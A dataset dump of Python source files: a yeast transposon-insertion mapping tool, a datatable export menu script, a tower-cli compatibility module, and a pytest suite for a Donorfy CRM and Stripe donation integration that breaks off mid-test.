Dataset schema (one row per column; "nullable" columns may contain null/⌀ values):

| column | dtype | range |
|---|---|---|
| hexsha | string | length 40-40 |
| size | int64 | 5 - 2.06M |
| ext | string | 10 classes |
| lang | string | 1 class |
| max_stars_repo_path | string | length 3-248 |
| max_stars_repo_name | string | length 5-125 |
| max_stars_repo_head_hexsha | string | length 40-78 |
| max_stars_repo_licenses | list | length 1-10 |
| max_stars_count | int64 (nullable) | 1 - 191k |
| max_stars_repo_stars_event_min_datetime | string (nullable) | length 24-24 |
| max_stars_repo_stars_event_max_datetime | string (nullable) | length 24-24 |
| max_issues_repo_path | string | length 3-248 |
| max_issues_repo_name | string | length 5-125 |
| max_issues_repo_head_hexsha | string | length 40-78 |
| max_issues_repo_licenses | list | length 1-10 |
| max_issues_count | int64 (nullable) | 1 - 67k |
| max_issues_repo_issues_event_min_datetime | string (nullable) | length 24-24 |
| max_issues_repo_issues_event_max_datetime | string (nullable) | length 24-24 |
| max_forks_repo_path | string | length 3-248 |
| max_forks_repo_name | string | length 5-125 |
| max_forks_repo_head_hexsha | string | length 40-78 |
| max_forks_repo_licenses | list | length 1-10 |
| max_forks_count | int64 (nullable) | 1 - 105k |
| max_forks_repo_forks_event_min_datetime | string (nullable) | length 24-24 |
| max_forks_repo_forks_event_max_datetime | string (nullable) | length 24-24 |
| content | string | length 5 - 2.06M |
| avg_line_length | float64 | 1 - 1.02M |
| max_line_length | int64 | 3 - 1.03M |
| alphanum_fraction | float64 | 0 - 1 |
| count_classes | int64 | 0 - 1.6M |
| score_classes | float64 | 0 - 1 |
| count_generators | int64 | 0 - 651k |
| score_generators | float64 | 0 - 1 |
| count_decorators | int64 | 0 - 990k |
| score_decorators | float64 | 0 - 1 |
| count_async_functions | int64 | 0 - 235k |
| score_async_functions | float64 | 0 - 1 |
| count_documentation | int64 | 0 - 1.04M |
| score_documentation | float64 | 0 - 1 |
9e8e6d830985755cf872faa18feca1ac284fe14d | 11,042 | py | Python | transposonmapper/transposonmapper.py | EKingma/Transposonmapper | 1413bda16a0bd5f5f3ccf84d86193c2dba0ab01b | ["Apache-2.0"] | 2 | 2021-11-23T09:39:35.000Z | 2022-01-25T15:49:45.000Z | transposonmapper/transposonmapper.py | EKingma/Transposonmapper | 1413bda16a0bd5f5f3ccf84d86193c2dba0ab01b | ["Apache-2.0"] | 76 | 2021-07-07T18:31:44.000Z | 2022-03-22T10:04:40.000Z | transposonmapper/transposonmapper.py | EKingma/Transposonmapper | 1413bda16a0bd5f5f3ccf84d86193c2dba0ab01b | ["Apache-2.0"] | 2 | 2021-09-16T10:56:20.000Z | 2022-01-25T12:33:25.000Z |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
This is a tool developed for analysing transposon insertions for experiments using SAturated Transposon Analysis in Yeast (SATAY).
This python code contains one function called transposonmapper().
For more information about this code and the project, see https://satay-ll.github.io/SATAY-jupyter-book/Introduction.html
This code is based on the Matlab code created by the Kornmann lab which is available at: sites.google.com/site/satayusers/
__Author__ = Gregory van Beek. LaanLab, department of Bionanoscience, Delft University of Technology
__version__ = 1.5
__Date last update__ = 2021-01-11
Version history:
1.1; Added code for creating two text files for storing insertion locations per gene and per essential gene [2020-07-27]
1.2; Improved searching algorithm for essential genes [2020-08-06]
1.3; Load file containing all essential genes so that a search for essential genes in multiple file is not needed anymore. This file is created using Create_EssentialGenes_list.py located in the same directory as this code [2020-08-07]
1.4; Fixed bug where the gene position and transposon insertion location did not start at zero for each chromosome, causing confusing values to be stored in the _pergene_insertions.txt and _peressential_insertions.txt files [2020-08-09]
1.5; Added functionality to handle all possible sam flags in the alignment file (bam-file) instead of only flag=0 or flag=16. This is needed for the function to handle paired-end sequencing data [2021-01-11]
"""
# Local imports
from transposonmapper.properties import (
get_chromosome_names,
get_sequence_length,
)
from transposonmapper.mapping import (
get_reads,
add_chromosome_length,
add_chromosome_length_inserts,
get_insertions_and_reads,
)
from transposonmapper.utils import chromosomename_roman_to_arabic
from transposonmapper.importing import (
load_default_files,
read_genes,
)
from transposonmapper.exporting import (
save_as_bed,
save_per_gene,
save_per_gene_insertions,
save_per_essential_insertions,
save_as_wig
)
import sys
def transposonmapper(bamfile, gff_file=None, essential_file=None, gene_name_file=None):
"""This function is created for analysis of SATAY data using the species Saccharomyces Cerevisiae.
The function assumes that the reads are already aligned to a reference genome.
The input data should be a .bam-file and the location where the .bam-file is stored should also contain an index file (.bam.bai-file, which for example can be created using sambamba).
The function uses the pysam package for handling bam files (see pysam.readthedocs.io/en/latest/index.html) and therefore this function only runs on Linux systems with SAMTools installed.
Parameters
----------
bamfile : str, required
Path to the bamfile. This location should also contain the .bam.bai index file (does not need to be input in this function).
gff_file : str, optional
Path to a .gff-file including all gene information (e.g. downloaded from SGD).
Default file is 'Saccharomyces_cerevisiae.R64-1-1.99.gff3'., by default None
essential_file : str, optional
        Path to a .txt file containing a list of all essential genes. Every line should consist of a single essential gene and the file should have one header line.
Ideally this file is created using 'Create_EssentialGenes_list.py'. Default file is 'Cerevisiae_AllEssentialGenes_List.txt'., by default None
gene_name_file : str, optional
Path to text file that includes aliases for all genes. Default file is 'Yeast_Protein_Names.txt', by default None
Returns
-------
A set of files
It outputs the following files that store information regarding the location of all insertions:
        - .bed-file: Includes all individual basepair locations of the whole genome where at least one transposon has been mapped and the number of insertions for each location (the number of reads) according to the Browser Extensible Data (bed) format.
        A distinction is made between reads that had a different reading orientation during sequencing. The number of reads is stored using the equation #reads*20+100 (e.g. 2 reads is stored as 140).
        - .wig-file: Includes all individual basepair locations of the whole genome where at least one transposon has been mapped and the number of insertions for each location (the number of reads) according to the Wiggle (wig) format.
        In this file no distinction is made between reads that had a different reading orientation during sequencing. The number of reads is stored as the absolute count.
- _pergene.txt-file: Includes all genes (currently 6600) with the total number of insertions and number of reads within the genomic region of the gene.
- _peressential.txt-file: Includes all annotated essential genes (currently 1186) with the total number of insertions and number of reads within the genomic region of the gene.
        - _pergene_insertions.txt-file: Includes all genes with their genomic location (i.e. chromosome number, start and end position) and the locations of all insertions within the gene location. It also includes the number of reads per insertion.
        - _peressential_insertions.txt-file: Includes all essential genes with their genomic location (i.e. chromosome number, start and end position) and the locations of all insertions within the gene location. It also includes the number of reads per insertion.
        (note that in the latter two files, the genomic locations are continuous, for example chromosome II does not start at 0, but at 'length chromosome I + 1' etc.).
The output files are saved at the location of the input file using the same name as the input file, but with the corresponding extension.
"""
# If necessary, load default files
gff_file, essential_file, gene_name_file = load_default_files(
gff_file, essential_file, gene_name_file
)
# Verify presence of files
data_files = {
"bam": bamfile,
"gff3": gff_file,
"essentials": essential_file,
"gene_names": gene_name_file,
}
for filetype, file_path in data_files.items():
assert file_path, f"{filetype} not found at {file_path}"
# Read files for all genes and all essential genes
print("Getting coordinates of all genes ...")
gene_coordinates, essential_coordinates, aliases_designation = read_genes(
gff_file, essential_file, gene_name_file
)
try:
import pysam
except ImportError:
print("Failed to import pysam")
sys.exit(1)
# Read bam file
bam = pysam.AlignmentFile(bamfile, "rb")
# Get names of all chromosomes as stored in the bam file
ref_tid = get_chromosome_names(bam)
ref_names = list(ref_tid.keys())
# Convert chromosome names in data file to roman numerals
ref_romannums = chromosomename_roman_to_arabic()[1]
ref_tid_roman = {key: value for key, value in zip(ref_romannums, ref_tid)}
# Get sequence lengths of all chromosomes
chr_lengths, chr_lengths_cumsum = get_sequence_length(bam)
# Get all reads within a specified genomic region
readnumb_array, tncoordinates_array, tncoordinatescopy_array = get_reads(bam)
#%% CONCATENATE ALL CHROMOSOMES
# For each insertion location, add the length of all previous chromosomes
tncoordinatescopy_array = add_chromosome_length_inserts(
tncoordinatescopy_array, ref_names, chr_lengths
)
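    # (e.g. an insertion at position 100 on chromosome II is now stored as
    # 'length of chromosome I' + 100, matching the docstring note above)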
# For each gene location, add the length of all previous chromosomes
gene_coordinates = add_chromosome_length(
gene_coordinates, chr_lengths_cumsum, ref_tid_roman
)
# For each essential gene location, add the length of all previous chromosomes
essential_coordinates = add_chromosome_length(
essential_coordinates, chr_lengths_cumsum, ref_tid_roman
)
# GET NUMBER OF TRANSPOSONS AND READS PER GENE
print("Get number of insertions and reads per gene ...")
# All genes
tn_per_gene, reads_per_gene, tn_coordinates_per_gene = get_insertions_and_reads(
gene_coordinates, tncoordinatescopy_array, readnumb_array
)
# Only essential genes
(
tn_per_essential,
reads_per_essential,
tn_coordinates_per_essential,
) = get_insertions_and_reads(
essential_coordinates, tncoordinatescopy_array, readnumb_array
)
# CREATE BED FILE
bedfile = bamfile + ".bed"
print("Writing bed file at: ", bedfile)
print("")
save_as_bed(bedfile, tncoordinates_array, ref_tid, readnumb_array)
# CREATE TEXT FILE WITH TRANSPOSONS AND READS PER GENE
# NOTE THAT THE TRANSPOSON WITH THE HIGHEST READ COUNT IS IGNORED.
# E.G. IF THIS FILE IS COMPARED WITH THE _PERGENE_INSERTIONS.TXT FILE THE READS DON'T ADD UP (SEE https://groups.google.com/forum/#!category-topic/satayusers/bioinformatics/uaTpKsmgU6Q)
    # TO REMOVE THIS HACK, CHANGE THE INITIALIZATION OF THE VARIABLE readpergene
per_gene_file = bamfile + "_pergene.txt"
print("Writing pergene.txt file at: ", per_gene_file)
print("")
save_per_gene(per_gene_file, tn_per_gene, reads_per_gene, aliases_designation)
# CREATE TEXT FILE TRANSPOSONS AND READS PER ESSENTIAL GENE
per_essential_file = bamfile + "_peressential.txt"
print("Writing peressential.txt file at: ", per_essential_file)
print("")
save_per_gene(
per_essential_file, tn_per_essential, reads_per_essential, aliases_designation
)
# CREATE TEXT FILE WITH LOCATION OF INSERTIONS AND READS PER GENE
per_gene_insertions_file = bamfile + "_pergene_insertions.txt"
print("Witing pergene_insertions.txt file at: ", per_gene_insertions_file)
print("")
save_per_gene_insertions(
per_gene_insertions_file,
tn_coordinates_per_gene,
gene_coordinates,
chr_lengths_cumsum,
ref_tid_roman,
aliases_designation,
)
# CREATE TEXT FILE WITH LOCATION OF INSERTIONS AND READS PER ESSENTIAL GENE
per_essential_insertions_file = bamfile + "_peressential_insertions.txt"
print(
"Writing peressential_insertions.txt file at: ", per_essential_insertions_file
)
print("")
save_per_essential_insertions(
per_essential_insertions_file,
tn_coordinates_per_essential,
gene_coordinates,
chr_lengths_cumsum,
ref_tid_roman,
aliases_designation,
)
# ADD INSERTIONS AT SAME LOCATION BUT WITH DIFFERENT ORIENTATIONS TOGETHER (FOR STORING IN WIG-FILE)
wigfile = bamfile + ".wig"
print("Writing wig file at: ", wigfile)
print("")
save_as_wig(wigfile, tncoordinates_array, ref_tid, readnumb_array)
#%%
if __name__ == "__main__":
bamfile = "transposonmapper/data_files/files4test/SRR062634.filt_trimmed.sorted.bam"
transposonmapper(bamfile=bamfile)
| 46.394958 | 271 | 0.741442 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7,223 | 0.654139 |
9e8f1e152b11b2dfb1cd7fa118a719d6c95eed5d | 1,975 | py | Python | DataTable/Tool/Tool.py | BoilTask/DataTable | d49afe9c43b0a247bc9bc6cceacdd912670eeed9 | ["MIT"] | 5 | 2020-08-07T17:31:13.000Z | 2022-03-03T07:44:29.000Z | DataTable/Tool/Tool.py | BoilTask/DataTable | d49afe9c43b0a247bc9bc6cceacdd912670eeed9 | ["MIT"] | null | null | null | DataTable/Tool/Tool.py | BoilTask/DataTable | d49afe9c43b0a247bc9bc6cceacdd912670eeed9 | ["MIT"] | 1 | 2022-03-03T07:44:32.000Z | 2022-03-03T07:44:32.000Z |
# -*- coding: UTF-8 -*-
import sys
from datatable import datatable
def process_file(file_id):
print("1.export_data")
print("2.generate_code & export_data")
choose_idx = input("plase choose : ")
if choose_idx == "1":
datatable.export_data(file_id)
elif choose_idx == "2":
datatable.generate_code(file_id)
datatable.export_data(file_id)
else:
print("not valid!")
def process_all_file_choose():
print("1.export_data")
print("2.generate_enum")
print("3.register_datatable")
print("4.generate_code & export_data")
print("0.all")
choose_idx = input("please choose : ")
if choose_idx == "0":
datatable.process_all_file()
elif choose_idx == "1":
datatable.export_data_all()
elif choose_idx == "2":
datatable.generate_enum()
elif choose_idx == "3":
datatable.register_datatable()
elif choose_idx == "4":
datatable.clean_export_data()
datatable.clean_generate_code()
datatable.export_data_generate_code_all()
if __name__ == "__main__":
if datatable.is_config_file_valid():
if len(sys.argv) > 1:
if sys.argv[1] == "all":
datatable.process_all_file()
elif sys.argv[1] == "export":
datatable.export_data_all()
exit(0)
        # User selection
print("Init Success!")
print("-------------")
file_dict = datatable.get_file_dict()
for file_key in file_dict:
print(str(file_key) + "." + file_dict[file_key][3:])
print("0.All")
print("-------------")
file_choose = input("Choose File : ")
if file_choose == "0":
process_all_file_choose()
else:
file_id = datatable.select_file_id(file_choose)
if file_id < 0:
print("not valid!")
else:
process_file(file_id)
else:
print("not valid!")
| 27.816901 | 64 | 0.571646 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 364 | 0.18356 |
9e922e429bd689190580fd828c6525764ab943c0 | 1,268 | py | Python | tower_cli/compat.py | kedark3/tower-cli | 487a1b9a8e96509798fee108e4f7d2c187177771 | ["Apache-2.0"] | 363 | 2015-01-14T17:48:34.000Z | 2022-01-29T06:37:04.000Z | tower_cli/compat.py | kedark3/tower-cli | 487a1b9a8e96509798fee108e4f7d2c187177771 | ["Apache-2.0"] | 703 | 2015-01-06T17:17:20.000Z | 2020-09-16T15:54:17.000Z | tower_cli/compat.py | kedark3/tower-cli | 487a1b9a8e96509798fee108e4f7d2c187177771 | ["Apache-2.0"] | 203 | 2015-01-18T22:38:23.000Z | 2022-01-28T19:19:05.000Z |
# Copyright 2015, Ansible, Inc.
# Luke Sneeringer <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Import OrderedDict from the standard library if possible, and from
# the ordereddict library (required on Python 2.6) otherwise.
try:
from collections import OrderedDict # NOQA
except ImportError: # Python < 2.7
from ordereddict import OrderedDict # NOQA
# Import simplejson if we have it (Python 2.6), and use json from the
# standard library otherwise.
#
# Note: Python 2.6 does have a JSON library, but it lacks `object_pairs_hook`
# as a keyword argument to `json.loads`, so we still need simplejson on
# Python 2.6.
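# For example, `object_pairs_hook` lets callers preserve key order while
# decoding: json.loads('{"a": 1, "b": 2}', object_pairs_hook=OrderedDict)
# yields OrderedDict([('a', 1), ('b', 2)]).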
import sys
if sys.version_info < (2, 7):
import simplejson as json # NOQA
else:
import json # NOQA
| 36.228571 | 77 | 0.746057 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,035 | 0.816246 |
9e92a7a7b55047819665042784eb05a1717697c3 | 19,250 | py | Python | py/tests/test_donorfy.py | samuelcolvin/nosht | 9e4d9bea8ff6bfae86cae948cc3028ccc68d0188 | ["MIT"] | 26 | 2018-07-28T23:11:27.000Z | 2022-02-09T13:40:33.000Z | py/tests/test_donorfy.py | samuelcolvin/nosht | 9e4d9bea8ff6bfae86cae948cc3028ccc68d0188 | ["MIT"] | 336 | 2018-05-25T17:57:00.000Z | 2022-03-11T23:24:36.000Z | py/tests/test_donorfy.py | samuelcolvin/nosht | 9e4d9bea8ff6bfae86cae948cc3028ccc68d0188 | ["MIT"] | 4 | 2018-07-18T08:37:19.000Z | 2022-01-31T14:42:48.000Z |
import json
import pytest
from buildpg import Values
from pytest import fixture
from pytest_toolbox.comparison import CloseToNow, RegexStr
from shared.actions import ActionTypes
from shared.donorfy import DonorfyActor
from shared.utils import RequestError
from web.utils import encrypt_json
from .conftest import Factory
@fixture(name='donorfy')
async def create_donorfy(settings, db_pool):
settings.donorfy_api_key = 'standard'
settings.donorfy_access_key = 'donorfy-access-key'
don = DonorfyActor(settings=settings, pg=db_pool, concurrency_enabled=False)
await don.startup()
redis = await don.get_redis()
await redis.flushdb()
yield don
await don.close(shutdown=True)
async def test_create_host_existing(donorfy: DonorfyActor, factory: Factory, dummy_server):
await factory.create_company()
await factory.create_user()
await donorfy.host_signuped(factory.user_id)
await donorfy.host_signuped(factory.user_id)
assert dummy_server.app['log'] == [
f'GET donorfy_api_root/standard/constituents/ExternalKey/nosht_{factory.user_id}',
]
async def test_create_host_new(donorfy: DonorfyActor, factory: Factory, dummy_server):
await factory.create_company()
await factory.create_user()
donorfy.settings.donorfy_api_key = 'new-user'
await donorfy.host_signuped(factory.user_id)
assert dummy_server.app['log'] == [
f'GET donorfy_api_root/new-user/constituents/ExternalKey/nosht_{factory.user_id}',
f'GET donorfy_api_root/new-user/constituents/EmailAddress/[email protected]',
f'POST donorfy_api_root/new-user/constituents',
]
async def test_create_event(donorfy: DonorfyActor, factory: Factory, dummy_server):
await factory.create_company()
await factory.create_user()
await factory.create_cat()
await factory.create_event(long_description='test ' * 100)
await donorfy.event_created(factory.event_id)
assert dummy_server.app['log'] == [
f'GET donorfy_api_root/standard/System/LookUpTypes/Campaigns',
f'GET donorfy_api_root/standard/constituents/ExternalKey/nosht_{factory.user_id}',
f'GET donorfy_api_root/standard/constituents/123456',
f'POST donorfy_api_root/standard/constituents/123456/AddActiveTags',
f'POST donorfy_api_root/standard/activities',
]
activity_data = dummy_server.app['data']['/donorfy_api_root/standard/activities 201']
assert activity_data['Code1'] == '/supper-clubs/the-event-name/'
assert activity_data['Code3'] == 'test test test test test test test test test...'
assert 'Code2' not in activity_data
async def test_create_event_no_duration(donorfy: DonorfyActor, factory: Factory, dummy_server):
await factory.create_company()
await factory.create_user()
await factory.create_cat()
await factory.create_event(price=10, duration=None)
donorfy.settings.donorfy_api_key = 'no-users'
await donorfy.event_created(factory.event_id)
assert dummy_server.app['log'] == [
f'GET donorfy_api_root/no-users/System/LookUpTypes/Campaigns',
f'GET donorfy_api_root/no-users/constituents/ExternalKey/nosht_{factory.user_id}',
f'GET donorfy_api_root/no-users/constituents/EmailAddress/[email protected]',
f'POST donorfy_api_root/no-users/constituents',
f'POST donorfy_api_root/no-users/constituents/456789/AddActiveTags',
f'POST donorfy_api_root/no-users/activities',
]
async def test_book_tickets(donorfy: DonorfyActor, factory: Factory, dummy_server):
await factory.create_company()
await factory.create_user()
await factory.create_cat()
await factory.create_event(price=10)
res = await factory.create_reservation()
await factory.buy_tickets(res)
assert dummy_server.app['log'] == [
f'GET donorfy_api_root/standard/System/LookUpTypes/Campaigns',
f'GET donorfy_api_root/standard/constituents/ExternalKey/nosht_{factory.user_id}',
f'GET donorfy_api_root/standard/constituents/123456',
f'POST donorfy_api_root/standard/activities',
f'GET stripe_root_url/balance/history/txn_charge-id',
f'POST donorfy_api_root/standard/transactions',
(
'email_send_endpoint',
'Subject: "The Event Name Ticket Confirmation", To: "Frank Spencer <[email protected]>"',
),
]
async def test_book_tickets_free(donorfy: DonorfyActor, factory: Factory, dummy_server):
await factory.create_company()
await factory.create_user()
await factory.create_cat()
await factory.create_event()
action_id = await factory.book_free(await factory.create_reservation())
await donorfy.tickets_booked(action_id)
assert dummy_server.app['log'] == [
f'GET donorfy_api_root/standard/System/LookUpTypes/Campaigns',
f'GET donorfy_api_root/standard/constituents/ExternalKey/nosht_{factory.user_id}',
f'GET donorfy_api_root/standard/constituents/123456',
f'POST donorfy_api_root/standard/activities',
]
async def test_book_tickets_multiple(donorfy: DonorfyActor, factory: Factory, dummy_server, db_conn):
await factory.create_company()
await factory.create_user()
await factory.create_cat()
await factory.create_event(duration=None)
donorfy.settings.donorfy_api_key = 'no-users'
ben = await factory.create_user(first_name='ben', email='[email protected]')
charlie = await factory.create_user(first_name='charlie', email='[email protected]')
danial = await factory.create_user(first_name='danial', email='[email protected]')
res = await factory.create_reservation(factory.user_id, ben, charlie, danial)
action_id = await factory.book_free(res)
v = await db_conn.execute('update tickets set user_id=null where user_id=$1', danial)
assert v == 'UPDATE 1'
await donorfy.tickets_booked(action_id)
assert set(dummy_server.app['log']) == {
f'GET donorfy_api_root/no-users/System/LookUpTypes/Campaigns',
f'GET donorfy_api_root/no-users/constituents/ExternalKey/nosht_{factory.user_id}',
f'GET donorfy_api_root/no-users/constituents/EmailAddress/[email protected]',
f'POST donorfy_api_root/no-users/constituents',
f'POST donorfy_api_root/no-users/activities',
f'GET donorfy_api_root/no-users/constituents/ExternalKey/nosht_{ben}',
f'GET donorfy_api_root/no-users/constituents/EmailAddress/[email protected]',
f'GET donorfy_api_root/no-users/constituents/ExternalKey/nosht_{charlie}',
f'GET donorfy_api_root/no-users/constituents/EmailAddress/[email protected]',
}
async def test_book_tickets_extra(donorfy: DonorfyActor, factory: Factory, dummy_server, db_conn):
await factory.create_company()
await factory.create_user()
await factory.create_cat(cover_costs_percentage=10)
await factory.create_event(status='published', price=100)
res = await factory.create_reservation()
action_id = await db_conn.fetchval_b(
'INSERT INTO actions (:values__names) VALUES :values RETURNING id',
values=Values(
company=factory.company_id,
user_id=factory.user_id,
type=ActionTypes.buy_tickets,
event=factory.event_id,
extra=json.dumps({'stripe_balance_transaction': 'txn_testing'}),
),
)
await db_conn.execute(
"UPDATE tickets SET status='booked', booked_action=$1 WHERE reserve_action=$2", action_id, res.action_id,
)
await db_conn.execute('update tickets set extra_donated=10')
await donorfy.tickets_booked(action_id)
assert set(dummy_server.app['log']) == {
f'GET donorfy_api_root/standard/constituents/ExternalKey/nosht_{factory.user_id}',
f'GET donorfy_api_root/standard/constituents/123456',
f'POST donorfy_api_root/standard/activities',
f'GET stripe_root_url/balance/history/txn_testing',
f'POST donorfy_api_root/standard/transactions',
f'POST donorfy_api_root/standard/transactions/trans_123/AddAllocation',
f'GET donorfy_api_root/standard/System/LookUpTypes/Campaigns',
}
async def test_book_multiple(donorfy: DonorfyActor, factory: Factory, dummy_server, cli, url, login):
await factory.create_company()
await factory.create_user()
await factory.create_cat()
await factory.create_user(first_name='T', last_name='B', email='[email protected]')
await factory.create_event(status='published', price=10)
await login(email='[email protected]')
data = {
'tickets': [
{'t': True, 'email': '[email protected]'},
{'t': True, 'email': '[email protected]'},
],
'ticket_type': factory.ticket_type_id,
}
r = await cli.json_post(url('event-reserve-tickets', id=factory.event_id), data=data)
assert r.status == 200, await r.text()
action_id = (await r.json())['action_id']
await factory.fire_stripe_webhook(action_id)
trans_data = dummy_server.app['post_data']['POST donorfy_api_root/standard/transactions']
assert len(trans_data) == 1
assert trans_data[0] == {
'ExistingConstituentId': '123456',
'Channel': 'nosht-supper-clubs',
'Currency': 'gbp',
'Campaign': 'supper-clubs:the-event-name',
'PaymentMethod': 'Payment Card via Stripe',
'Product': 'Event Ticket(s)',
'Fund': 'Unrestricted General',
'Department': '220 Ticket Sales',
'BankAccount': 'Unrestricted Account',
'DatePaid': CloseToNow(delta=4),
'Amount': 20.0,
'ProcessingCostsAmount': 0.5,
'Quantity': 2,
'Acknowledgement': 'supper-clubs-thanks',
'AcknowledgementText': RegexStr('Ticket ID: .*'),
'Reference': 'Events.HUF:supper-clubs the-event-name',
'AddGiftAidDeclaration': False,
'GiftAidClaimed': False,
}
async def test_book_offline(donorfy: DonorfyActor, factory: Factory, dummy_server, cli, url, login):
await factory.create_company()
await factory.create_cat()
await factory.create_user(role='host')
await factory.create_event(price=10)
await login()
res = await factory.create_reservation()
app = cli.app['main_app']
data = dict(booking_token=encrypt_json(app, res.dict()), book_action='buy-tickets-offline')
r = await cli.json_post(url('event-book-tickets'), data=data)
assert r.status == 200, await r.text()
assert 'POST donorfy_api_root/standard/transactions' not in dummy_server.app['post_data']
async def test_donate(donorfy: DonorfyActor, factory: Factory, dummy_server, db_conn, cli, url, login):
await factory.create_company()
await factory.create_user()
await factory.create_cat()
await factory.create_event(price=10)
await factory.create_donation_option()
await login()
r = await cli.json_post(
url('donation-after-prepare', don_opt_id=factory.donation_option_id, event_id=factory.event_id)
)
assert r.status == 200, await r.text()
action_id = (await r.json())['action_id']
post_data = dict(
title='Mr',
first_name='Joe',
last_name='Blogs',
address='Testing Street',
city='Testingville',
postcode='TE11 0ST',
)
r = await cli.json_post(url('donation-gift-aid', action_id=action_id), data=post_data)
assert r.status == 200, await r.text()
assert 0 == await db_conn.fetchval('SELECT COUNT(*) FROM donations')
await factory.fire_stripe_webhook(action_id, amount=20_00, purpose='donate')
assert 1 == await db_conn.fetchval('SELECT COUNT(*) FROM donations')
assert dummy_server.app['log'] == [
'POST stripe_root_url/customers',
'POST stripe_root_url/payment_intents',
'GET donorfy_api_root/standard/System/LookUpTypes/Campaigns',
f'GET donorfy_api_root/standard/constituents/ExternalKey/nosht_{factory.user_id}',
'GET donorfy_api_root/standard/constituents/123456',
'GET stripe_root_url/balance/history/txn_charge-id',
'POST donorfy_api_root/standard/transactions',
'POST donorfy_api_root/standard/constituents/123456/GiftAidDeclarations',
('email_send_endpoint', 'Subject: "Thanks for your donation", To: "Frank Spencer <[email protected]>"'),
]
async def test_donate_no_gift_aid(donorfy: DonorfyActor, factory: Factory, dummy_server, db_conn, cli, url, login):
await factory.create_company()
await factory.create_user()
await factory.create_cat()
await factory.create_event(price=10)
await factory.create_donation_option()
await login()
r = await cli.json_post(
url('donation-after-prepare', don_opt_id=factory.donation_option_id, event_id=factory.event_id)
)
assert r.status == 200, await r.text()
action_id = (await r.json())['action_id']
await factory.fire_stripe_webhook(action_id, amount=20_00, purpose='donate')
assert 1 == await db_conn.fetchval('SELECT COUNT(*) FROM donations')
assert dummy_server.app['log'] == [
'POST stripe_root_url/customers',
'POST stripe_root_url/payment_intents',
'GET donorfy_api_root/standard/System/LookUpTypes/Campaigns',
f'GET donorfy_api_root/standard/constituents/ExternalKey/nosht_{factory.user_id}',
'GET donorfy_api_root/standard/constituents/123456',
'GET stripe_root_url/balance/history/txn_charge-id',
'POST donorfy_api_root/standard/transactions',
('email_send_endpoint', 'Subject: "Thanks for your donation", To: "Frank Spencer <[email protected]>"'),
]
async def test_update_user(donorfy: DonorfyActor, factory: Factory, dummy_server):
await factory.create_company()
await factory.create_user()
await donorfy.update_user(factory.user_id)
assert set(dummy_server.app['log']) == {
f'GET donorfy_api_root/standard/constituents/ExternalKey/nosht_{factory.user_id}',
'PUT donorfy_api_root/standard/constituents/123456',
'POST donorfy_api_root/standard/constituents/123456/Preferences',
}
async def test_update_user_neither(donorfy: DonorfyActor, factory: Factory, dummy_server):
await factory.create_company()
await factory.create_user()
await donorfy.update_user(factory.user_id, update_user=False, update_marketing=False)
assert dummy_server.app['log'] == [
f'GET donorfy_api_root/standard/constituents/ExternalKey/nosht_{factory.user_id}',
]
async def test_update_user_no_user(donorfy: DonorfyActor, factory: Factory, dummy_server):
await factory.create_company()
await factory.create_user()
donorfy.settings.donorfy_api_key = 'no-user'
await donorfy.update_user(factory.user_id)
assert set(dummy_server.app['log']) == {
f'GET donorfy_api_root/no-user/constituents/ExternalKey/nosht_{factory.user_id}',
'GET donorfy_api_root/no-user/constituents/EmailAddress/[email protected]',
'POST donorfy_api_root/no-user/constituents',
'POST donorfy_api_root/no-user/constituents/456789/Preferences',
}
async def test_get_user_update(donorfy: DonorfyActor, factory: Factory, dummy_server):
await factory.create_company()
await factory.create_user()
donorfy.settings.donorfy_api_key = 'no-ext-id'
const_id = await donorfy._get_constituent(user_id=factory.user_id, email='[email protected]')
assert const_id == '456789'
assert dummy_server.app['log'] == [
f'GET donorfy_api_root/no-ext-id/constituents/ExternalKey/nosht_{factory.user_id}',
f'GET donorfy_api_root/no-ext-id/constituents/EmailAddress/[email protected]',
'PUT donorfy_api_root/no-ext-id/constituents/456789',
]
async def test_get_user_wrong_id(donorfy: DonorfyActor, factory: Factory, dummy_server):
await factory.create_company()
await factory.create_user()
donorfy.settings.donorfy_api_key = 'wrong-ext-id'
const_id = await donorfy._get_constituent(user_id=factory.user_id, email='[email protected]')
assert const_id is None
assert dummy_server.app['log'] == [
f'GET donorfy_api_root/wrong-ext-id/constituents/ExternalKey/nosht_{factory.user_id}',
f'GET donorfy_api_root/wrong-ext-id/constituents/EmailAddress/[email protected]',
]
async def test_bad_response(donorfy: DonorfyActor, dummy_server):
with pytest.raises(RequestError):
await donorfy.client.get('/foobar')
assert dummy_server.app['log'] == [
'GET donorfy_api_root/standard/foobar',
]
async def test_campaign_exists(donorfy: DonorfyActor, dummy_server):
await donorfy._get_or_create_campaign('supper-clubs', 'the-event-name')
assert dummy_server.app['log'] == ['GET donorfy_api_root/standard/System/LookUpTypes/Campaigns']
await donorfy._get_or_create_campaign('supper-clubs', 'the-event-name')
assert dummy_server.app['log'] == ['GET donorfy_api_root/standard/System/LookUpTypes/Campaigns'] # cached
async def test_campaign_new(donorfy: DonorfyActor, dummy_server):
await donorfy._get_or_create_campaign('supper-clubs', 'foobar')
assert dummy_server.app['log'] == [
'GET donorfy_api_root/standard/System/LookUpTypes/Campaigns',
'POST donorfy_api_root/standard/System/LookUpTypes/Campaigns',
]
await donorfy._get_or_create_campaign('supper-clubs', 'foobar')
assert len(dummy_server.app['log']) == 2
async def test_get_constituent_update_campaign(donorfy: DonorfyActor, dummy_server):
donorfy.settings.donorfy_api_key = 'default-campaign'
await donorfy._get_constituent(user_id=123, campaign='foo:bar')
assert dummy_server.app['log'] == [
f'GET donorfy_api_root/default-campaign/constituents/ExternalKey/nosht_123',
'GET donorfy_api_root/default-campaign/constituents/123456',
'PUT donorfy_api_root/default-campaign/constituents/123456',
]
async def test_donate_direct(donorfy: DonorfyActor, factory: Factory, dummy_server, db_conn, cli, url, login):
await factory.create_company()
await factory.create_user()
await factory.create_cat()
await factory.create_event(price=10, allow_donations=True, status='published')
await login()
r = await cli.json_post(
